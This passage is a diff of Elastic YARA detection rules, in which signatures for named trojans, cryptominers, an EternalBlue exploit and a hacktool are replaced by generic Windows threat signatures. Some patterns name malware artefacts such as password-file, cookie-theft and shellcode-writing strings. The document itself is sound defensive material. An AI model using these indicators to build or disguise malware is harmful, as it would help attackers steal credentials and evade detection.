69 41 66 6E 68 73 6F 72 48 60 6C 65 49 46 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Minertr_9901E275 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Dcc622A4 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Minertr (Linux.Cryptominer.Minertr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "9901e275-3053-47ea-8c36-6c9271923b64" - date = "2021-01-12" - modified = "2021-09-16" + id = "dcc622a4-5c10-463b-a950-fc728f990bca" + date = "2024-02-14" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Minertr.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f77246a93782fd8ee40f12659f41fccc5012a429a8600f332c67a7c2669e4e8f" - logic_hash = "a18e0763fe9aec6d89b39cefb872b1751727e2d88ec4733b9c8b443b83219763" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2620-L2638" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "94a3f10396c07783586070119becf0924de9a7caf449d6e07065837d54e6222d" + logic_hash = "9254226918f39389ccc347de1c5064552a8500ccef1884b8e27b6e98c651f45b" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "f27e404d545f3876963fd6174c4235a4fe4f69d53fe30a2d29df9dad6d97b7f7" - severity = 100 + fingerprint = "b47bd4baa68dc56948f29882cf5762b0af2d9f2a837349add4f5d0a8d4152cb2" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 41 56 41 55 41 54 55 53 48 83 EC 78 48 89 3C 24 89 F3 89 74 } + $a1 = { 5B 21 5D 20 45 72 72 6F 72 20 77 72 69 74 69 6E 67 20 73 68 65 6C 6C 63 6F 64 65 20 74 6F 20 74 68 65 20 74 61 72 67 65 74 20 64 72 69 76 65 72 2C 20 61 62 6F 72 74 } condition: all of them } -rule ELASTIC_Windows_Exploit_Eternalblue_Ead33Bf8 : FILE +rule ELASTIC_Windows_Generic_Threat_046Aa1Ec : FILE MEMORY { meta: - description = "Detects Windows Exploit Eternalblue (Windows.Exploit.Eternalblue)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "ead33bf8-1870-4d01-a223-edcbe262542f" - date = "2021-01-12" - modified = "2021-08-23" + id = "046aa1ec-5134-4a03-85c2-048b5d363484" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_Eternalblue.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a1340e418c80be58fb6bbb48d4e363de8c6d62ea59730817d5eda6ba17b2c7a7" - logic_hash = "4d0ab8bd7ef5b20e656110ac3c78b08803539387cb4fe1425a284d39c42aa199" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2640-L2658" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c74cf499fb9298d43a6e64930addb1f8a8d8336c796b9bc02ffc260684ec60a2" + logic_hash = "da6552da3db4851806f5a0ce3c324a79acf4ee4b2690cb02cc8d8c88a2ba28f8" score = 75 quality = 75 - tags = "FILE" - fingerprint = "9e3b5f4f0b8ac683544886abbd9eecbf0253a7992ee5d99c453de67b9aacdccd" - severity = 100 + tags = "FILE, MEMORY" + fingerprint = "46591671500f83b6627a17368a0bbe43650da1dd58ba1a136a47818fe685bc68" + severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { F8 31 C9 EB 0B 40 8A 3C 0E 40 88 3C 08 48 FF C1 48 39 D1 75 } + $a1 = { 83 C4 F4 D9 7D FE 66 8B 45 FE 80 CC 0C 66 89 45 FC D9 6D FC DF 7D F4 D9 6D FE 8B 45 F4 8B 55 F8 8B E5 5D C3 55 8B EC 51 33 D2 8D 5D 08 8B 03 83 C3 04 85 C0 74 03 03 50 04 49 75 F1 85 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ladvix_Db41F9D2 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_85C73807 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "db41f9d2-aa5c-4d26-b8ba-cece44eddca8" - date = "2021-01-12" - modified = "2021-09-16" + id = "85c73807-4181-4d4a-ba51-6ed923121486" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ladvix.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "81642b4ff1b6488098f019c5e992fc942916bc6eb593006cf91e878ac41509d6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2660-L2678" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7f560a22c1f7511518656ac30350229f7a6847d26e1b3857e283f7dcee2604a0" + logic_hash = "90aa64f17b91ccdf367e1976cd1f5e89e15c7369a58b2d19187143e70939d756" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d0aaa680e81f44cc555bf7799d33fce66f172563788afb2ad0fb16d3e460e8c6" - severity = 100 + fingerprint = "8b63723aa1b89149c360048900a18e25a0a615f50cec1aaadca2578684f5bcb2" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C0 49 89 C4 74 45 45 85 ED 7E 26 48 89 C3 41 8D 45 FF 4D 8D 7C } + $a1 = { 55 8B EC 51 53 56 57 89 4D FC 8B DA 8B F0 8B 7D 08 C6 86 18 01 00 00 00 8B C3 E8 15 01 00 00 84 C0 75 0E 8B 55 FC 8B C6 8B CF E8 45 F8 FF FF EB 0F 56 57 8B FE 8B F3 B9 47 00 00 00 F3 A5 5F 5E } condition: all of them } -rule ELASTIC_Linux_Trojan_Ladvix_77D184Fd : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_642Df623 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "77d184fd-a15e-40e5-ac7e-0d914cc009fe" - date = "2021-01-12" - modified = "2021-09-16" + id = "642df623-00ae-48a9-8d61-aaa688606807" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ladvix.yar#L20-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1bb44b567b3c82f7ee0e08b16f7326d1af57efe77d608a96b2df43aab5faa9f7" - logic_hash = "0ae9c41d3eb7964344f71b9708278a0e83776228e4455cf0ad7c08e288305203" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2680-L2698" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e5ba85d1a6a54df38b5fa655703c3457783f4a4f71e178f83d8aac878d4847da" + logic_hash = "555eb66f117312fa4ff3a49c0c40f89caddec3eb4b93d11bda2cce40529d46a0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "21361ca7c26c98903626d1167747c6fd11a5ae0d6298d2ef86430ce5be0ecd1a" - severity = 100 + fingerprint = "fb2c74f7e3e7f4e25173c375fe863e643183da4f5d718d61fdd0271fcc581deb" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 40 10 48 89 45 80 8B 85 64 FF FF FF 48 89 E2 48 89 D3 48 63 D0 48 83 } + $a1 = { 55 8B EC 50 B8 04 00 00 00 81 C4 04 F0 FF FF 50 48 75 F6 8B 45 FC 81 C4 3C FE FF FF 53 56 57 64 8B 05 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC 33 C9 8B 45 FC 89 45 DC 8B 45 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ladvix_C9888Edb : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_27A2994F : FILE MEMORY { meta: - description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c9888edb-0f82-4c7a-b501-4e4d3c9c64e3" - date = "2021-01-12" - modified = "2021-09-16" + id = "27a2994f-18e4-4608-bda6-ee76b6afd357" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ladvix.yar#L40-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1d798e9f15645de89d73e2c9d142189d2eaf81f94ecf247876b0b865be081dca" - logic_hash = "608f2340b0ee4b843933d8137aa0908583a6de477e6c472fb4bd2e5bb62dfb80" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2700-L2718" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e534914e06d90e119ce87f5abb446c57ec3473a29a7a9e7dc066fdc00dc68adc" + logic_hash = "66f34ba3052e2369528aeaf076f10d58f8f3dca420666246e02191fecb057f8c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e0e0d75a6de7a11b2391f4a8610a6d7c385df64d43fa1741d7fe14b279e1a29a" - severity = 100 + fingerprint = "33d3f5b2c5fed68b19e14d6a35ee8db4ba3d6d566c87e24fc7a9223235cbd0ee" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E8 01 83 45 E4 01 8B 45 E4 83 F8 57 76 B5 83 45 EC 01 8B 45 EC 48 } + $a1 = { 55 8B EC 51 53 56 57 83 7D 08 00 75 05 E9 88 00 00 00 6A 09 E8 D7 FD FF FF 83 C4 04 8B 45 08 83 E8 20 89 45 FC 8B 4D FC 8B 51 14 81 E2 FF FF 00 00 83 FA 04 74 41 8B 45 FC 83 78 14 01 74 38 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Ladvix_81Fccd74 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Dbceec58 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ladvix (Linux.Trojan.Ladvix)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "81fccd74-465d-4f2e-b879-987bc47828dd" - date = "2021-06-28" - modified = "2021-09-16" - reference = "2a183f613fca5ec30dfd82c9abf72ab88a2c57d2dd6f6483375913f81aa1c5af" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ladvix.yar#L60-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "18f7ca953d22f02c1dbf03595a19b66ea582d2c1623f0042dcf15f86556ca41e" + id = "dbceec58-0b98-470c-8439-23aa26b4064f" + date = "2024-02-20" + modified = "2024-06-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2720-L2738" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fbec30528e6f261aebf0d41f3cd6d35fcc937f1e20e1070f99b1b327f02b91e0" + logic_hash = "2a99fb7b342b43e3a4f0136d7d618625ca5708ae32e6fcabb11420bd8c89915b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0e983107f38a6b2a739a44ab4d37c35c5a7d8217713b280a1786511089084a95" - severity = "100" + fingerprint = "5f470a7367ebbffebae8384aa552b3e9b1bda6bf4a3241bda047970341ee7c4c" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 45 EA 00 00 48 8D 45 EA 48 8B 55 F0 0F B6 12 88 10 0F B7 45 EA 0F } + $a1 = { 83 EC 14 83 7D 08 00 74 0C 83 7D 0C 00 74 06 83 7D 10 00 75 08 8B 45 08 E9 87 00 00 00 8B 45 08 89 45 FC 8B 45 0C 89 45 F8 8B 45 10 C1 E8 02 89 45 EC 83 65 F4 00 EB 07 8B 45 F4 40 89 } condition: all of them } -rule ELASTIC_Macos_Cryptominer_Xmrig_241780A1 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_7407Eb79 : FILE MEMORY { meta: - description = "Detects Macos Cryptominer Xmrig (MacOS.Cryptominer.Xmrig)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "241780a1-ad50-4ded-b85a-26339ae5a632" - date = "2021-09-30" - modified = "2021-10-25" + id = "7407eb79-69fd-4f5c-b883-ceb74fbdc9d5" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Cryptominer_Xmrig.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f" - logic_hash = "9e091f6881a96abdc6592db385eb9026806befdda6bda4489470b4e16e1d4d87" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2740-L2758" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9ae0f053c8e2c4f4381eac8265170b79301d4a22ec1fdb86e5eb212c51a75d14" + logic_hash = "a60c3e54493f9dab71584ba301c41c43f30d554df8c0b05674995faaf407ee48" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8" - severity = 100 + fingerprint = "f1dbb42fdd80020fa2b30beb50ded6b8b3fe4b023935cef9bd32b3cb0a095654" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = "mining.set_target" ascii fullword - $a2 = "XMRIG_HOSTNAME" ascii fullword - $a3 = "Usage: xmrig [OPTIONS]" ascii fullword - $a4 = "XMRIG_VERSION" ascii fullword + $a1 = { 83 EC 18 8B 45 08 8B 40 08 89 45 E8 8B 45 08 8B 40 0C 89 45 EC 8B 45 EC 83 C0 0C 89 45 F0 8B 45 F0 8B 00 89 45 F8 83 65 F4 00 E8 00 00 00 00 58 89 45 F4 8B 45 F8 3B 45 F0 74 31 8B 45 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Hpportio_B31E3473 : FILE +rule ELASTIC_Windows_Generic_Threat_3613Fa12 : FILE MEMORY { meta: - description = "Name: HpPortIox64.sys, Version: 1.2.0.9" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b31e3473-b87e-47df-b3ec-b09c69dcbb4e" - date = "2022-04-07" - modified = "2022-04-07" + id = "3613fa12-b559-4c3f-8049-11bacd5ffd0c" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_HpPortIo.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5" - logic_hash = "e449b45f3cf2836254614bbdc957aa7093162fc1acd672edd931d5f240503963" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2760-L2778" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1403ec99f262c964e3de133a10815e34d2f104b113b0197ab43c6b7b40b536c0" + logic_hash = "77b23aaf384de138214e64342e170f3dce667ee41c3063c999286da9af6fff42" score = 75 quality = 75 - tags = "FILE" - fingerprint = "66067334492941eb2da8c72dc0d2f55ba1c2b564904f40b6e77925262501abd9" - threat_name = "Windows.VulnDriver.HpPortIo" + tags = "FILE, MEMORY" + fingerprint = "c66b5dad2e9b19be0bc67a652761d8f79ce85efde055cc412575c2d7c5583795" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 48 00 70 00 50 00 6F 00 72 00 74 00 49 00 6F 00 78 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x02][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x09][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a1 = { 55 8B EC 51 89 4D FC 8D 45 08 50 8B 4D FC E8 4D 03 00 00 8B 45 FC 8B E5 5D C2 04 00 CC CC CC CC 55 8B EC 51 89 4D FC 8B 45 FC 8B E5 5D C3 CC CC 55 8B EC 51 89 4D FC 8B 45 08 50 8B 4D FC E8 FD } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Hacktool_Blackbone_2Ff5Ec38 : FILE +rule ELASTIC_Windows_Generic_Threat_B125Fff2 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Blackbone (Windows.Hacktool.BlackBone)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "2ff5ec38-ce35-432a-8ffa-d459f84438dd" - date = "2022-04-04" - modified = "2022-04-04" + id = "b125fff2-7b36-431f-8ed3-ccb6d4ff9483" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_BlackBone.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4e3887f950bff034efedd40f1e949579854a24140128246fa6141f2c34de6017" - logic_hash = "0c32bd04460cdf7a56664253992a684c2c684b15ac9ca853b27ab24f07f71607" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2780-L2798" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9c641c0c8c2fd8831ee4e3b29a2a65f070b54775e64821c50b8ccd387e602097" + logic_hash = "054f3f36c688e1f5c3116e7a926df12df90f79dc1d42bee2616b5251f6ad2c24" score = 75 quality = 75 - tags = "FILE" - fingerprint = "e3df60931c040081214296f006d98e155a5dc7e285a840a1decb23186ef67465" + tags = "FILE, MEMORY" + fingerprint = "e2562c480b3ab0f0e6c5d396bc5d0584481348c1dd8edaac4484d9cb5d4a2b2e" severity = 50 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $str1 = "BlackBone: %s: ZwCreateThreadEx hThread 0x%X" + $a1 = { 6F 00 00 0A 6F 70 00 00 0A 00 28 24 00 00 06 0A 06 2C 24 00 28 1B 00 00 06 0B 07 2C 19 00 28 CE 04 00 06 16 FE 01 0C 08 2C 0B 7E 03 00 00 04 6F D3 04 00 06 00 00 00 28 1A 00 00 06 00 28 18 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Linux_Trojan_Backegmm_B59712E6 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D7E5Ec2D : FILE MEMORY { meta: - description = "Detects Linux Trojan Backegmm (Linux.Trojan.Backegmm)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b59712e6-d14d-4a57-a3d6-2dc323bf840d" - date = "2021-01-12" - modified = "2021-09-16" + id = "d7e5ec2d-bcd1-41a3-80de-12808b9034c9" + date = "2024-02-20" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Backegmm.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d6c8e15cb65102b442b7ee42186c58fa69cd0cb68f4fd47eb5ad23763371e0be" - logic_hash = "a2e6016bfd8475880c28c89b5f5beeef1335de9529d44bbe7c5aaa352aab9a29" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2800-L2818" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fe711664a565566cbc710d5e678a9a30063a2db151ebec226e2abcd24c0a7e68" + logic_hash = "4edb8cc1da81e0b9b3a8facc9a9a7d1e27dff0d2db7851d06a209beec3ccb463" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "61b2f0c7cb98439b05776edeaf06b114d364119ebe733d924158792110c5e21c" - severity = 100 + fingerprint = "e679e6917c5055384c0492e4a8a7538b41e5239b78e2167b04fffa3693f036bb" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 69 73 74 65 6E 00 66 6F 72 6B 00 73 70 72 69 6E 74 66 00 68 } + $a1 = { 83 C4 F8 89 45 FC 8B 45 FC E8 17 FE FF FF 83 FA 00 75 03 83 F8 FF 77 16 8B 45 FC E8 F1 FE FF FF 83 FA 00 75 03 83 F8 FF 77 04 33 C0 EB 02 B0 01 88 45 FB 8A 45 FB 59 59 5D C3 8D 40 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Dragonbreath_B27Bc56B : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_1636C2Bf : FILE MEMORY { meta: - description = "Detects Windows Trojan Dragonbreath (Windows.Trojan.DragonBreath)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "b27bc56b-41a2-4b3d-bff4-a14b90debe08" - date = "2024-06-05" + id = "1636c2bf-5506-4651-9c4c-cd6454386301" + date = "2024-03-04" modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DragonBreath.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45023fd0e694d66c284dfe17f78c624fd7e246a6c36860a0d892d232a30949be" - logic_hash = "b86d5541a7e03a698ad918cdbba987474c6680353b4d2de2f8422ecd0ebcac61" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2820-L2838" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6e43916db43d8217214bbe4eb32ed3d82d0ac423cffc91d053a317a3dbe6dafb" + logic_hash = "c8b198cd5f9277ff3808ee2a313ab979d544b9e609d6623876d2e3c3c5668e38" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "4bc82f64191cf907d7ecf7da5453258c9be60e5dbaff770ebc22d9629bcbc7e2" - severity = 100 + fingerprint = "b0cd9f484d4191d42091300be33c72a29c073c297b4e46811555fc6d1ab0f482" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 50 6C 75 67 69 6E 4D 65 } - $a2 = { 69 73 41 52 44 6C 6C } - $a3 = { 25 64 2D 25 64 2D 25 64 20 25 64 3A 25 64 } + $a1 = { 28 00 00 0A 28 22 00 00 0A 80 19 00 00 04 28 3B 00 00 06 28 2D 00 00 0A 28 45 00 00 06 16 80 1D 00 00 04 7E 13 00 00 04 7E 15 00 00 04 16 7E 15 00 00 04 8E B7 16 14 FE 06 43 00 00 06 73 63 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Danabot_6F3Dadb2 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_0A640296 : FILE MEMORY { meta: - description = "Detects Windows Trojan Danabot (Windows.Trojan.Danabot)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6f3dadb2-3283-4333-8143-1265721d2221" - date = "2021-08-15" - modified = "2021-10-04" + id = "0a640296-0813-4cd3-b55b-01b3689e73d9" + date = "2024-03-04" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Danabot.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "716e5a3d29ff525aed30c18061daff4b496f3f828ba2ac763efd857062a42e96" - logic_hash = "b9c895be9eab775726abd2c13256d598c5b79bceb2d652c30b1df4cfc37e4b93" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2840-L2858" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3682eff62caaf2c90adef447d3ff48a3f9c34c571046f379d2eaf121976f1d07" + logic_hash = "743c47c7a58e7d65261818b4b444aaf8015b9b55d3e54526b1d63a8770a6c5aa" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "387e3fb3c3f625c8b5e42052c126ce4dbb7de3a7de6b68addf0a0777b9d3b504" - severity = 100 + fingerprint = "3fa8712dbf0cdb0581fc312bcfa2e9ea50e04cccba6dc93f377c1b64e96784aa" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "%s.dll" ascii fullword - $a2 = "del_ini://Main|Password|" wide fullword - $a3 = "S-Password.txt" wide fullword - $a4 = "BiosTime:" wide fullword - $a5 = "%lu:%s:%s:%d:%s" ascii fullword - $a6 = "DNS:%s" ascii fullword - $a7 = "THttpInject&" ascii fullword - $a8 = "TCookies&" ascii fullword + $a1 = { 28 00 00 0A 02 7B 0F 00 00 04 6F 29 00 00 0A 7D 10 00 00 04 02 7B 10 00 00 04 28 2A 00 00 0A 00 02 7B 08 00 00 04 7B 03 00 00 04 